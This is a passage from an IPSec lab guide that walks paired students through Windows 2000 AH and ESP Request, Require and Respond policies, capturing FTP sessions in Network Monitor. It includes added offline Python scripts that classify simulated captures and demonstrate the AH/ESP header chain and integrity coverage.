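# Task 2D-4: both sides have an ESP policy; after the ISAKMP exchange nothing but
# ESP is visible, so the "handshake" in frames 14 and 15 is opaque.
CAPTURE_NEGOTIATED = (
    [Frame(1, P, Q, "ARP", "request"), Frame(2, Q, P, "ARP", "reply"),
     Frame(3, P, Q, "TCP", "S")]
    + [Frame(n, Q if n % 2 == 0 else P, P if n % 2 == 0 else Q, "ISAKMP", "negotiation")
       for n in range(4, 14)]
    + [Frame(14, P, Q, "ESP", "SPI 0x1000"), Frame(15, Q, P, "ESP", "SPI 0x2000")]
)

# Task 2D-6: Q requires IPsec, P has unassigned its policy; Q keeps offering
# ISAKMP, P keeps retransmitting its SYN, and nothing completes.
CAPTURE_REQUIRE_BLOCKED = [
    Frame(1, P, Q, "ARP", "request"), Frame(2, Q, P, "ARP", "reply"),
    Frame(3, P, Q, "TCP", "S"),
    Frame(4, Q, P, "ISAKMP", "main mode 1"),
    Frame(5, Q, P, "ISAKMP", "main mode 1 (retry)"),
    Frame(6, P, Q, "TCP", "S"), Frame(7, P, Q, "TCP", "S"),
]


def report(captures):
    """Return {label: verdict}; a defender would alert on any 'cleartext-fallback'."""
    return {label: classify(frames, P, Q) for label, frames in captures.items()}


if __name__ == "__main__":
    for label, verdict in report({
        "2D-3 request vs. no policy": CAPTURE_REQUEST_FALLBACK,
        "2D-4 request vs. respond": CAPTURE_NEGOTIATED,
        "2D-6 require vs. no policy": CAPTURE_REQUIRE_BLOCKED,
    }).items():
        print(f"{label}: {verdict}")
```

The verdict a defender cares about is "cleartext-fallback": the responder advertised IPSec, received no answer, and still served the session in the clear, which is exactly the downgrade a Request policy permits and a Require policy prevents.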

TASK 2D-6
Require-and-Respond ESP Implementation and Analysis

Note: Perform the following step only if you are designated as Student_Q.

1. In your ipsec.mmc.msc console, right-click the 4_REQUIRE_ESP(des)_only policy, and choose Assign. Close the console.

Note: Perform step 2 through step 5 only if you are designated as Student_P.

2. At the command prompt, again enter ftp IP_address_of_Student_Q.

3. After a substantial delay, observe that you cannot ftp to Student_Q. In fact, you should receive a message indicating that the connection has timed out.

4. Enter quit to stop the ftp attempt.

5. Open your ipsec.mmc.msc console. Right-click the 3_RESPOND_ESP(des)_only policy, and choose Assign. Close the console.

Note: Perform the following step only if you are designated as Student_Q.

6. Start Network Monitor, and start a capture.

Note: Perform step 7 through step 10 only if you are designated as Student_P.

7. At the command prompt, again enter ftp IP_address_of_Student_Q. You should be able to successfully ftp to Student_Q.

8. Log on as anonymous with no password.

9. Enter dir to see a list of files hosted on the ftp site.

10. Exit the ftp session.


Note: Perform step 11 through step 12 only if you are designated as Student_Q.

11. In Network Monitor, stop and view the capture.

12. Observe that these captures are exactly the same as when the 3_REQUEST_ESP(des)_only and the 3_RESPOND_ESP(des)_only policies were in force earlier.

Close Network Monitor, saving the capture if you like.

Topic 2E
Combining AH and ESP in IPSec

You have configured and analyzed IPSec traffic by using AH, and IPSec traffic by using ESP. In this topic, you will configure and analyze network traffic that combines AH and ESP. When you are using both AH and ESP, you are configuring IPSec to its fullest strength.

TASK 2E-1
Creating the 5_REQUEST_AH(md5)+ESP(des) IPSec Policy and the Response Policy

Note: Perform this task only if you are designated as Student_Q. Student_P is advised to follow along.

1. Open your ipsec.mmc.msc console. In the right pane, unassign the 4_REQUIRE_ESP(des)_only policy, and then create another IP Security Policy. Click Next.

2. For the IP Security Policy Name, enter 5_REQUEST_AH(md5)+ESP(des), and click Next.

3. Uncheck Activate The Default Response Rule, and click Next.

4. Uncheck Edit Properties, and click Finish.

5. Double-click the new policy.

6. On the Rules tab, verify that Use Add Wizard is unchecked, and click Add.

7. On the IP Filter List tab, click the radio button for All IP Traffic.

8. Switch to the Filter Action tab.

9. Click the radio button for Request Security (Optional).

10. Click Edit.


11. Leave the radio button selected for Negotiate Security.

12. Read the options presented to you under Security Method Preference Order.

13. Remove all but one method by holding the Shift key, selecting all but one of the choices, and clicking Remove. Some configurations might have only one option. If so, skip the next step.

14. When prompted with Are You Sure?, click Yes.

15. Select the remaining method, and click Edit.

16. Under Security Method, click the Settings button found under Custom (For Expert Users).

17. Verify that AH is checked.

18. Select the integrity algorithm MD5.

19. Verify that ESP is checked.

20. Leave ESP’s integrity algorithm set to <None>.

21. For Encryption Algorithm, select DES.

22. Under the Session Key settings, verify that the two boxes for generating new keys for both time and size are unchecked.

23. Click OK three times to return to the Rule Properties.

24. Switch to the Authentication Methods tab.

25. Click Edit.

26. Click the radio button for Use This String To Protect The Key Exchange (Preshared Key), and in the box, enter Purple Enigma to provide the text for the preshared key.

27. Click OK, and then click Close to return to the Policy Properties.

28. On the Rules tab, check <Dynamic> Default Response, and click Edit. The Use Add Wizard check box should remain unchecked.

29. Under Security Methods, hold the Shift key, select all but one of the choices, and click Remove.

30. Select the remaining method, and click Edit.

31. Under Security Method, click the Settings button found under Custom (For Expert Users).

32. Verify that AH is checked.

33. Select the integrity algorithm MD5.

34. Verify that ESP is checked.


35. Leave ESP’s integrity algorithm set to <None>.

36. For Encryption Algorithm, select DES.

37. Under the Session Key settings, verify that the two boxes for generating new keys for both time and size are unchecked.

38. Click OK twice to return to the Rule Properties.

39. Switch to the Authentication Methods tab.

40. Click Edit.

41. Click the radio button for Use This String To Protect The Key Exchange (Preshared Key), and in the box, enter Purple Enigma to provide the text for the preshared key.

42. Click OK twice, and then click Close to exit the Policy Properties.

43. Close the console without saving settings.

Configuring the IPSec Response

You have configured a policy where Student_Q will request other computers that attempt to communicate with it to implement AH by using the MD5 integrity algorithm and ESP by using the DES encryption algorithm; Student_Q is also in a position to respond by using this algorithm. Let’s configure Student_P to follow Student_Q’s lead.

TASK 2E-2
Creating the 5_RESPOND_AH(md5)+ESP(des) IPSec Policy

Note: Perform this task only if you are designated as Student_P. Student_Q is advised to follow along.

1. Open your ipsec.mmc.msc console. In the right pane, unassign the 3_RESPOND_ESP(des)_only policy, then create another IP Security Policy. Click Next.

2. For the IP Security Policy Name, enter 5_RESPOND_AH(md5)+ESP(des), and click Next.

3. Uncheck Activate The Default Response Rule, and click Next.

4. Uncheck Edit Properties, and click Finish.

5. Double-click the new policy.

6. On the Rules tab, verify that Use Add Wizard is unchecked, check <Dynamic> Default Response, and click Edit.


7. Remove all but one security method by holding the Shift key, selecting all but one of the choices, and clicking Remove.

8. When prompted with Are You Sure?, click Yes.

9. Select the remaining method, and click Edit.

10. Under Security Method, click the Settings button found under Custom (For Expert Users).

11. Verify that AH is checked.

12. Select the integrity algorithm MD5.

13. Verify that ESP is checked.

14. Leave ESP’s integrity algorithm set to <None>.

15. For Encryption Algorithm, select DES.

16. Under the Session Key settings, verify that the two boxes for generating new keys for both time and size are unchecked.

17. Click OK twice to return to the Rule Properties.

18. Switch to the Authentication Methods tab.

19. Click Edit.

20. Click the radio button for Use This String To Protect The Key Exchange (Preshared Key), and in the box, enter Purple Enigma to provide the text for the preshared key.

21. Click OK twice, and then click Close to close the Policy Properties.

22. Close the console without saving settings.

AH and ESP IPSec Session Analysis

You have just gone through the steps of configuring IPSec on both Student_P and Student_Q. In the next task, you will initiate a communication between the two hosts, and analyze the communication in Network Monitor.

The initial communication will be an attempt at using FTP. As with the 1_REQUEST_AH(md5)_only and 3_REQUEST_ESP(des)_only policies, this transaction is also successful between Student_P and Student_Q because Student_Q’s policy is designed to request—not demand—IPSec. If a remote machine trying to communicate with Student_Q is not IPSec-aware or does not have a policy assigned to do so, then Student_Q will fall back to regular, insecure IP. The brief delay occurs because Student_Q is trying to establish an IPSec communication with Student_P. Once the connection is made, the second computer will be configured to respond to the first properly.


During the session analysis, try to note the differences from the earlier captures—those resulting from the AH_only and ESP_only policies. Here, you are not able to see any of the TCP flags, connection setup, three-way handshake completion, or data transfer—in fact, you will see nothing but encrypted stuff! The protocol is listed simply as ESP. If you check the details within the IP header, IP points to AH—IP protocol ID 51 (0x33) and AH points to ESP—IP protocol ID 50 (0x32). After the IP header is AH/ESP. Nobody but these two endpoints can decrypt packets destined for them.
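The header chain described above (IP protocol 51 leading to AH, whose next-header field is 50 leading to ESP, after which nothing is readable) is what Network Monitor's Protocol column is walking when it labels a frame "ESP". The Python script below is an added example, not course code: it builds two constructed packets (one cleartext TCP segment carrying an FTP LIST command, one AH+ESP packet with a dummy ICV and dummy ciphertext standing in for the real HMAC-MD5-96 and DES-CBC output) and walks the chain the way a capture tool would, reporting what an on-path observer can and cannot read.

```python
"""Walk the IP protocol chain of a captured packet the way Network Monitor's
Protocol column does: IP (protocol 51) -> AH -> (next header 50) ESP -> opaque.

Added example; the packets below are constructed, with a dummy AH ICV and dummy
ESP ciphertext, so the walk runs offline.
"""
import struct

IPPROTO_TCP, IPPROTO_ESP, IPPROTO_AH = 6, 50, 51
PROTO_NAMES = {1: "ICMP", 6: "TCP", 17: "UDP", 50: "ESP", 51: "AH"}
ICV_LEN = 12  # HMAC-MD5-96 / HMAC-SHA1-96: 96-bit truncated ICV


def ipv4(proto, payload, ttl=64, src=b"\x0a\x00\x00\x01", dst=b"\x0a\x00\x00\x02"):
    """Minimal 20-byte IPv4 header (checksum left at 0) in front of `payload`."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0x1234, 0x4000,
                      ttl, proto, 0, src, dst)
    return hdr + payload


def ah(next_header, spi, seq, icv):
    """AH header (RFC 2402): payload length is in 32-bit words minus 2."""
    payload_len = (12 + len(icv)) // 4 - 2
    return struct.pack("!BBHII", next_header, payload_len, 0, spi, seq) + icv


def esp(spi, seq, ciphertext):
    """ESP header (RFC 2406) followed by whatever the SA encrypted."""
    return struct.pack("!II", spi, seq) + ciphertext


def walk_headers(packet):
    """Return the list of (layer, details) an on-path observer can read."""
    ihl = (packet[0] & 0x0F) * 4
    proto = packet[9]
    layers = [("IPv4", {"protocol": proto, "ttl": packet[8]})]
    off = ihl
    while True:
        if proto == IPPROTO_AH:
            nh, plen, _, spi, seq = struct.unpack_from("!BBHII", packet, off)
            ah_len = (plen + 2) * 4
            layers.append(("AH", {"spi": spi, "seq": seq, "icv_len": ah_len - 12,
                                  "next_header": nh}))
            off += ah_len
            proto = nh
        elif proto == IPPROTO_ESP:
            spi, seq = struct.unpack_from("!II", packet, off)
            # Everything after SPI and sequence number is ciphertext: no TCP flags,
            # no FTP commands, nothing to search for without the SA's key.
            layers.append(("ESP", {"spi": spi, "seq": seq,
                                   "opaque_bytes": len(packet) - off - 8}))
            return layers
        else:
            layers.append((PROTO_NAMES.get(proto, str(proto)),
                           {"clear_bytes": len(packet) - off}))
            return layers


def displayed_protocol(packet):
    """The name Network Monitor would show in its Protocol column: the last
    layer it can parse."""
    return walk_headers(packet)[-1][0]


# Constructed samples. The cleartext one carries an FTP LIST command; the
# IPsec one carries the same command, but behind AH (MD5) + ESP (DES).
CLEAR_PACKET = ipv4(IPPROTO_TCP, b"\x00\x15\x04\xd2" + b"\x00" * 16 + b"LIST\r\n")
FAKE_ICV = b"\xa5" * ICV_LEN                 # constructed: real value is HMAC-MD5-96
FAKE_CIPHERTEXT = bytes(range(0x20, 0x38))   # constructed: real value is DES-CBC output
IPSEC_PACKET = ipv4(IPPROTO_AH, ah(IPPROTO_ESP, 0x1000, 1, FAKE_ICV)
                    + esp(0x2000, 1, FAKE_CIPHERTEXT))

if __name__ == "__main__":
    for name, pkt in (("cleartext", CLEAR_PACKET), ("AH+ESP", IPSEC_PACKET)):
        print(name, displayed_protocol(pkt), walk_headers(pkt))
        print("  'LIST' visible:", b"LIST" in pkt)
```

The SPI and sequence number of each SA remain readable in both AH and ESP, which is why an observer can still count frames and match them to a session even though the payload is opaque.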

TASK 2E-3
Configuring and Analyzing an IPSec Session Using AH and ESP

Note: Perform step 1 through step 2 only if you are designated as Student_Q.

1. Open your ipsec.mmc.msc console. Right-click the 5_REQUEST_AH(md5)+ESP(des) policy and choose Assign. Close the console.

2. Start Network Monitor, and start a capture.

Note: Perform step 3 through step 7 only if you are designated as Student_P.

3. At the command prompt, again enter ftp IP_address_of_Student_Q. You should be able to successfully ftp to Student_Q after a very brief delay, even though an IPSec policy is assigned on Student_Q.

4. Log on as anonymous with no password.

5. Enter dir to see a list of files hosted on the ftp site.

6. Exit the ftp session.

7. Open your ipsec.mmc.msc console. Right-click the 5_RESPOND_AH(md5)+ESP(des) policy, and choose Assign.

Note: Perform step 8 through step 10 only if you are designated as Student_Q.

8. In Network Monitor, stop and view the capture.

9. Observe the session between the two hosts.

10. Start a new capture (save the previous capture if you like).

Note: Perform step 11 through step 14 on Student_P.

11. At the command prompt, again enter ftp IP_address_of_Student_Q. You should be able to successfully ftp to Student_Q.

12. Log on as anonymous with no password.


13. Enter dir to see a list of files hosted on the ftp site.

14. Exit the ftp session.

Note: Perform step 15 through step 22 only if you are designated as Student_Q.

15. In Network Monitor, stop and view the capture.

16. Observe that, after the ARP resolution has taken place (in frames 1 and 2), Student_P attempts to initiate a three-way handshake with Student_Q (in frame 3).

17. Observe that, when the policy on Student_Q says to request IPSec communication, Student_Q begins the negotiation process (in frame 4) by using the ISAKMP protocol (UDP port 500).

18. Observe that, when Student_P agrees to comply (in frame 5), there is an ISAKMP interplay between the two machines for the next few frames to negotiate and establish the IPSec protocol.

19. Observe that the actual three-way handshake is now completed in frames 14 and 15.

20. Search the packets, and try to look for the name of the text file in response to the dir (LIST) command.

21. Observe that, from frames 14 onward until the session teardown, AH ensures integrity and ESP ensures confidentiality of communication between the two machines.

22. Close Network Monitor. You can save your capture to a file if you like.

Note: Perform the following step only if you are designated as Student_P.

23. Open your ipsec.mmc.msc console, unassign the 5_RESPOND_AH(md5)+ESP(des) policy, and close the console.

Requiring AH and ESP in an IPSec Session

Again, let’s modify the situation a bit. You’ll configure Student_Q to demand IPSec of other computers by using the Require policy instead of the Request policy. From Student_P, you’ll attempt to communicate with Student_Q and fail. You’ll then reassign the Respond policy on Student_P, so that you are able to establish communications with Student_Q.


TASK 2E-4
Creating the 6_REQUIRE_AH(md5)+ESP(des) IPSec Policy

Note: Perform this task only if you are designated as Student_Q. Student_P is advised to follow along.

1. Open your ipsec.mmc.msc console, and unassign the 5_REQUEST_AH(md5)+ESP(des) policy.

2. Create another IP Security Policy. Click Next.

3. For the IP Security Policy Name, enter 6_REQUIRE_AH(md5)+ESP(des), and click Next.

4. Uncheck Activate The Default Response Rule, and click Next.

5. Uncheck Edit Properties, and click Finish.

6. Double-click the new policy.

7. On the Rules tab, verify that Use Add Wizard is unchecked, and click Add.

8. On the IP Filter List tab, click the radio button for All IP Traffic.

9. Switch to the Filter Action tab.

10. Click the radio button for Require Security.

11. Click Edit.

12. Leave the radio button selected for Negotiate Security.

13. If necessary, remove all but one security method.

14. Select the remaining method, and click Edit.

15. Under Security Method, click the Settings button found under Custom (For Expert Users).

16. Verify that AH is checked and that the integrity algorithm is set to MD5.

17. Verify that ESP is checked.

18. Leave ESP’s integrity algorithm set to <None>.

19. For Encryption Algorithm, select DES.

20. Under the Session Key settings, verify that the two boxes for generating new keys for both time and size are unchecked.

21. Click OK. If you receive an information box indicating that you are on a Medium security level, click OK to agree to it.


22. Click OK twice to return to the Rule Properties.

23. Switch to the Authentication Methods tab.

24. Click Edit.

25. Click the radio button for Use This String To Protect The Key Exchange (Preshared Key), and in the box, enter Purple Enigma to provide the text for the preshared key.

26. Click OK to close the Authentication Methods.

27. Click Close twice to exit the Policy Properties.

28. Assign the new policy, and close the console without saving settings.

Using Mismatched AH and ESP IPSec Policies

You have configured a policy where Student_Q will require other computers that attempt to communicate with it to implement AH by using the MD5 algorithm; Student_Q also will respond only by using this algorithm. Now, let’s see what happens when Student_P does not follow Student_Q’s lead.

TASK 2E-5
Matching and Analyzing AH and ESP IPSec Policies

Note: Perform step 1 through step 2 only if you are designated as Student_Q.

1. Activate Network Monitor, and start a capture.

2. Monitor the network traffic between the Student_P and Student_Q machines, while the ftp session is attempted, and fails, due to mismatched policies.

Note: Perform step 3 through step 6 only if you are designated as Student_P.

3. At the command prompt, again enter ftp IP_address_of_Student_Q.

4. Observe that, after a substantial delay, you are not able to ftp to Student_Q. In fact, you should receive a message stating that the connection has timed out.

5. Enter quit.

6. Open your ipsec.mmc.msc console. Right-click the 5_RESPOND_AH(md5)+ESP(des) policy and choose Assign. Close the console.

Note: Perform the following step only if you are designated as Student_Q.

7. Stop and view, then start a new capture.


Note: Perform step 8 through step 11 only if you are designated as Student_P.

8. At the command prompt, again enter ftp IP_address_of_Student_Q. You should be able to successfully ftp to Student_Q.

9. Log on as anonymous with no password.

10. Enter dir to see a list of files hosted on the ftp site.

11. Exit the ftp session.

Note: Perform the rest of this task only if you are designated as Student_Q.

12. In Network Monitor, stop and view the capture.

13. Observe that these captures are exactly the same as when the 5_REQUEST_AH(md5)+ESP(des) and the 5_RESPOND_AH(md5)+ESP(des) policies were in force earlier.

14. Try to identify a difference in the negotiation process. There is no difference with respect to the negotiation process, there is no difference with respect to the encryption of all subsequent information, and so forth.

15. Examine the data beyond the IP header. Once ISAKMP establishes the encryption algorithms between the two machines, as far as an eavesdropper is concerned, there will be nothing but binary garbage beyond the IP header.

16. Close Network Monitor. You can save your capture to a file if you like.

Configuring All the Options

Now, let’s step up the requirements for IPSec. Let’s say you were paranoid and wanted to use all the features set to their highest security settings. You will configure an IPSec policy on Student_Q that will use the SHA-1 algorithm to ensure integrity and 3DES to ensure confidentiality. You will then configure Student_Q to demand IPSec of other computers. To do so, you will use a Require policy instead of a Request policy. Finally, on Student_P, you will implement a corresponding Respond policy and establish communications with Student_Q.

Someone may bring up the question, “Hey, why would you use the integrity algorithm twice?” At this point, we’ll leave the answer as a smug “Because we can!” Actually, there is a more simplified explanation.

Most books on IPSec recommend using AH to ensure the integrity of the entire packet and ESP just for confidentiality of the payload. Most books on IPSec also simply say that ESP “...can also be used for integrity.” Let’s look at this a little more carefully.

The AH’s function is to sign the entire packet, including the IP header. However, there are certain fields in the IP header that have to be excluded because they are designed to change. One example of this is when traversing a routed environment, the 8-bit TTL field will decrement by 1 at each hop. The values contained within these fields cannot be signed, as the received value would not match the value at origin.


The ESP’s function is to encrypt and/or sign everything but the IP header. In Transport Mode, using ESP’s signing functionality might be considered redundant when AH is around to do the job, especially when AH can sign even the IP headers (mostly).

It’s when IPSec is implemented in Tunnel Mode, as with a VPN solution, that ESP’s signing functionality has some meaning over and above that of AH. In Tunnel Mode, there are two IP headers in each packet. The outer IP header is the one used by the tunnel endpoints to communicate with each other. Encapsulated within this as payload data is the IP header, IP protocol, and the actual data of the two hosts communicating end-to-end via the tunnel. Therefore, when the tunnel endpoints use ESP’s integrity algorithm, the internal IP headers are treated as data and will be completely signed.
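The two points above (AH must leave the mutable IP header fields out of its signature, and ESP's own integrity check is what covers the encapsulated header in Tunnel Mode) can be checked with a few lines of code. The Python script below is an added example, not course code: it builds toy transport-mode AH and tunnel-mode ESP packets using constructed addresses and a constructed per-SA key (not the IKE preshared key from the tasks), omits encryption so the encapsulated header stays visible, and shows that a router's TTL decrement leaves AH verification intact, while a change to an immutable field, or to the inner header's TTL inside a tunnel, is caught.

```python
"""Why AH skips mutable IP header fields, and why ESP's own integrity check still
matters in tunnel mode.

Added example with toy packet builders; the SA key is constructed, no encryption
is performed (so the encapsulated header stays readable for the demonstration),
and the MACs follow the RFC 2403/2404 96-bit truncation.
"""
import hashlib
import hmac
import struct

IPPROTO_TCP, IPPROTO_ESP, IPPROTO_AH = 6, 50, 51
ICV_LEN = 12  # HMAC-MD5-96 and HMAC-SHA1-96 both truncate to 96 bits
KEY = b"constructed-sa-key"  # constructed; a real SA key is derived by IKE, not the preshared key


def ipv4_header(proto, payload_len, ttl=64,
                src=b"\x0a\x00\x00\x01", dst=b"\x0a\x00\x00\x02"):
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 1, 0x4000,
                       ttl, proto, 0, src, dst)


def zero_mutable(ip_hdr):
    """IPv4 header with the fields AH must not sign set to zero: TOS, flags and
    fragment offset, TTL, header checksum (RFC 2402 section 3.3.3.1)."""
    h = bytearray(ip_hdr)
    h[1] = 0             # TOS
    h[6:8] = b"\0\0"     # flags + fragment offset
    h[8] = 0             # TTL, decremented by every router
    h[10:12] = b"\0\0"   # header checksum, recomputed by every router
    return bytes(h)


def ah_icv(key, ip_hdr, ah_fixed, payload):
    """AH ICV: HMAC-MD5-96 over the immutable header fields, the AH header with
    its ICV field zeroed, and everything after it."""
    data = zero_mutable(ip_hdr) + ah_fixed + bytes(ICV_LEN) + payload
    return hmac.new(key, data, hashlib.md5).digest()[:ICV_LEN]


def build_ah_transport(key, payload, ttl=64):
    """Transport mode: IP(51) | AH(next=TCP) | TCP segment."""
    ah_fixed = struct.pack("!BBHII", IPPROTO_TCP, (12 + ICV_LEN) // 4 - 2, 0, 0x1000, 1)
    ip = ipv4_header(IPPROTO_AH, len(ah_fixed) + ICV_LEN + len(payload), ttl)
    return ip + ah_fixed + ah_icv(key, ip, ah_fixed, payload) + payload


def verify_ah_transport(key, packet):
    ip, rest = packet[:20], packet[20:]
    ah_fixed, icv, payload = rest[:12], rest[12:12 + ICV_LEN], rest[12 + ICV_LEN:]
    return hmac.compare_digest(icv, ah_icv(key, ip, ah_fixed, payload))


def build_esp_tunnel(key, inner_packet):
    """Tunnel mode: outer IP(50) | ESP(spi, seq) | [inner IP packet] | ICV.
    Real ESP encrypts the inner packet plus trailer before authenticating; the
    toy skips encryption so the inner header can be inspected. The ICV
    (HMAC-SHA1-96) covers the ESP header and the whole inner packet."""
    body = struct.pack("!II", 0x2000, 1) + inner_packet
    icv = hmac.new(key, body, hashlib.sha1).digest()[:ICV_LEN]
    return ipv4_header(IPPROTO_ESP, len(body) + ICV_LEN) + body + icv


def verify_esp_tunnel(key, packet):
    body, icv = packet[20:-ICV_LEN], packet[-ICV_LEN:]
    return hmac.compare_digest(icv, hmac.new(key, body, hashlib.sha1).digest()[:ICV_LEN])


def forward_one_hop(packet):
    """What every router does to the outermost header: TTL minus one."""
    p = bytearray(packet)
    p[8] -= 1
    return bytes(p)


def tamper(packet, offset):
    """Flip one bit at `offset` (used on an immutable field such as the source address)."""
    p = bytearray(packet)
    p[offset] ^= 0x01
    return bytes(p)


INNER_TTL = 20 + 8 + 8  # outer IP header + ESP header + offset of TTL in the inner IP header

if __name__ == "__main__":
    ah_pkt = build_ah_transport(KEY, b"LIST\r\n")
    print("AH ok after one hop:", verify_ah_transport(KEY, forward_one_hop(ah_pkt)))
    print("AH ok after source change:", verify_ah_transport(KEY, tamper(ah_pkt, 15)))
    tun = build_esp_tunnel(KEY, ah_pkt)
    print("ESP tunnel ok after outer hop:", verify_esp_tunnel(KEY, forward_one_hop(tun)))
    print("ESP tunnel ok after inner TTL change:", verify_esp_tunnel(KEY, tamper(tun, INNER_TTL)))
```

Note the asymmetry the script makes visible: the outer header's TTL is not covered by ESP at all (the tunnel packet still verifies after a hop), while the inner header, being payload from ESP's point of view, is covered byte for byte, TTL included.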

By the way, before you get carried away with IPSec, it is also recommended that you read Bruce Schneier’s excellent critique on IPSec. You can find it at his company’s Web site, www.counterpane.com.

TASK 2E-6
Implementing the 7_REQUIRE_AH(sha)+ESP(sha+3des) Policy

Note: Perform this task only if you are designated as Student_Q. Student_P is advised to follow along.

1. Create another IP Security Policy. Click Next.

2. For the IP Security Policy Name, enter 7_REQUIRE_AH(sha)+ESP(sha+3des), and click Next.

3. Uncheck Activate The Default Response Rule, and click Next.

4. Uncheck Edit Properties, and click Finish.

5. Double-click the new policy.

6. On the Rules tab, verify that Use Add Wizard is unchecked, and click Add.

7. On the IP Filter List tab, click the radio button for All IP Traffic.

8. Switch to the Filter Action tab.

9. Click the radio button for Require Security.

10. Click Edit.

11. Leave the radio button selected for Negotiate Security.

12. If necessary, remove all but one security method.

13. Select the remaining method, and click Edit.


14. Under Security Method, click the Settings button found under Custom (For Expert Users).

15. Verify that AH is checked.

16. Select the integrity algorithm as SHA1.

17. Verify that ESP is checked.

18. Select ESP’s integrity algorithm as SHA1.

19. For Encryption Algorithm, select 3DES.

20. Under the Session Key settings, verify that the two boxes for generating new keys for both time and size are unchecked.

21. Click OK three times to return to the Rule Properties.

22. Switch to the Authentication Methods tab.

23. Click Edit.

24. Click the radio button for Use This String To Protect The Key Exchange (Preshared Key), and in the box, enter Purple Enigma to provide the text for the preshared key.

25. Click OK, and then click Close twice to exit the Policy Properties.

26. Close the console without saving settings.

Configuring the AH-and-ESP IPSec Response Policy

In order for the two hosts to communicate, they must have compatible IPSec policies implemented. By now, you are familiar with the procedure, so the following task should be rather straightforward.

TASK 2E-7
Implementing the 7_RESPOND_AH(sha)+ESP(sha+3des) Policy

Note: Perform this task only if you are designated as Student_P. Student_Q is advised to follow along.

1. Create another IP Security Policy. Click Next.

2. For the IP Security Policy Name, enter 7_RESPOND_AH(sha)+ESP(sha+3des), and click Next.

3. Uncheck Activate The Default Response Rule, and click Next.

4. Uncheck Edit Properties, and click Finish.


5. Double-click the new policy.

6. On the Rules tab, verify that Use Add Wizard is unchecked, check <Dynamic> Default Response, and click Edit.

7. Remove all but one security method.

8. Select the remaining method, and click Edit.

9. Under Security Method, click the Settings button found under Custom (For Expert Users).

10. Verify that AH is checked.

11. Select the integrity algorithm as SHA1.

12. Verify that ESP is checked.

13. Select ESP’s integrity algorithm as SHA1.

14. For Encryption Algorithm, select 3DES.

15. Under Session Key settings, verify that the two boxes for generating new keys for both time and size are unchecked.

16. Click OK twice to return to the Rule Properties.

17. Switch to the Authentication Methods tab.

18. Click Edit.

19. Click the radio button for Use This String To Protect The Key Exchange (Preshared Key), and in the box, enter Purple Enigma to provide the text for the preshared key.

20. Click OK twice, and then click Close to exit the Policy Properties.

21. Close the console without saving settings.

Implementing the Full IPSec Session

So far, you have configured a policy where Student_Q will require other computers that attempt to communicate with it to implement AH by using the SHA-1 algorithm and ESP by using both the SHA-1 and 3DES algorithms; Student_Q also will respond only by using this algorithm. Now, let’s see what happens when Student_P follows Student_Q’s lead.

When you perform the final analysis in Network Monitor, keep the following in mind: If you were to perform a Hex-to-Hex comparison of the two captures, you would see that due to the additional overhead imposed by the 7_REQUIRE_AH(sha)+ESP(sha+3des) policy over the 6_REQUIRE_AH(md5)+ESP(des) policy, the actual number of bits is greater. In fact, if you had tried to actually transfer large files between the two machines, then the number of frames would have actually been greater.


TASK 2E-8
Implementing and Analyzing an AH(sha) and ESP(sha+3des) IPSec Session

Note: Perform step 1 through step 2 only if you are designated as Student_Q.

1. Open your ipsec.mmc.msc console. Assign the 7_REQUIRE_AH(sha)+ESP(sha+3des) policy. When you assign this policy, the previously assigned policy is automatically unassigned.

2. Start Network Monitor, and start a capture.

Note: Perform step 3 through step 7 only if you are designated as Student_P.

3. Open your ipsec.mmc.msc console. Assign the 7_RESPOND_AH(sha)+ESP(sha+3des) policy.

4. At the command prompt, enter ftp IP_address_of_Student_Q. You shouldbe able to successfully ftp to Student_Q.

5. Log on as anonymous with no password.

6. Enter dir to see a list of files hosted on the ftp site.

7. Exit the ftp session.

Note: Perform the rest of this task only if you are designated as Student_Q.

8. In Network Monitor, stop and view the capture.

9. Observe that these captures are more or less the same as when the 6_REQUIRE_AH(md5)+ESP(des) and 5_RESPOND_AH(md5)+ESP(des) policies were in force earlier.

10. Identify any differences with respect to the negotiation process, encryption, or integrity algorithms.

11. Close Network Monitor. You can save your capture to a file if you like.

Using the Filter Lists

In all of the previous scenarios, we spent most of the time trying to figure out the effect of using various combinations of integrity and confidentiality algorithms. Once you have decided on a particular combination, you can also use the policy to explicitly secure network traffic, depending on network or host address or protocol. You do this by editing the filter list.


TASK 2E-9
Editing Filter Lists to Explicitly Secure Traffic

Note: Perform step 1 through step 18 only if you are designated as Student_Q.

1. From the Start menu, choose Settings→Network And Dial-up Connections.

2. Right-click the Classroom Hub interface, and choose Enable.

3. Ping the IP address of your nearest router. You should not be able to reach the router, as the IPSec policy on your machine is restrictive.

4. Open the ipsec.mmc.msc console and unassign the 7_REQUIRE_AH(sha)+ESP(sha+3des) policy.

5. Double-click the policy 7_REQUIRE_AH(sha)+ESP(sha+3des).

6. On the Rules tab, under IP Security Rules, select All IP Traffic.

7. Click Edit.

8. Under IP Filter Lists, select All IP Traffic.

9. Click Edit.

10. Under Filters, observe that one rule is already included for you.

11. Select this rule and click Edit.

12. In the Filter Properties dialog box, observe the drop-down lists for Source Address and Destination Address.

13. For Source Address, select My IP Address, if necessary.

14. For Destination Address, select A Specific IP Address.

15. In the IP Address box, enter the specific IP address for Student_P (172.26.10.x or 172.28.10.x).

16. Leave Mirrored checked.

17. Click OK, and then click Close three times.

18. Right-click the policy 7_REQUIRE_AH(sha)+ESP(sha+3des), and choose Assign.

Note: Perform step 19 through step 24 only if you are designated as Student_P.

19. From the Start menu, choose Settings→Network And Dial-up Connections.

20. Right-click the Partner interface, and choose Properties.


21. Double-click Internet Protocol (TCP/IP).

22. Edit the IP address by adding 100 to the last octet. That is, if the IP address is 172.26.10.1, make it 172.26.10.101.

23. Click OK twice.

24. At a command prompt, enter ipconfig to verify the change in your IP address.

Note: Perform the next step only if you are designated as Student_Q.

25. Activate Network Monitor, and start a capture.

Note: Perform step 26 through step 29 only if you are designated as Student_P.

26. At the command prompt, enter ftp IP_address_of_Student_Q. You should be able to successfully ftp to Student_Q.

27. Log on as anonymous with no password.

28. Enter dir to see a list of files hosted on the ftp site.

29. Exit the ftp session, and close all open windows.

Now let’s look at the captures in Network Monitor and see what was different from the previous capture.

Note: Perform the rest of this task only if you are designated as Student_Q. Student_P is advised to follow along and participate in any ensuing discussion.

30. In Network Monitor, stop and view the capture.

31. Observe that there is no ISAKMP negotiation, no ESP, and so forth.

32. Why did the supposedly secure Require IPSec policy allow Student_P to communicate with it in plaintext?

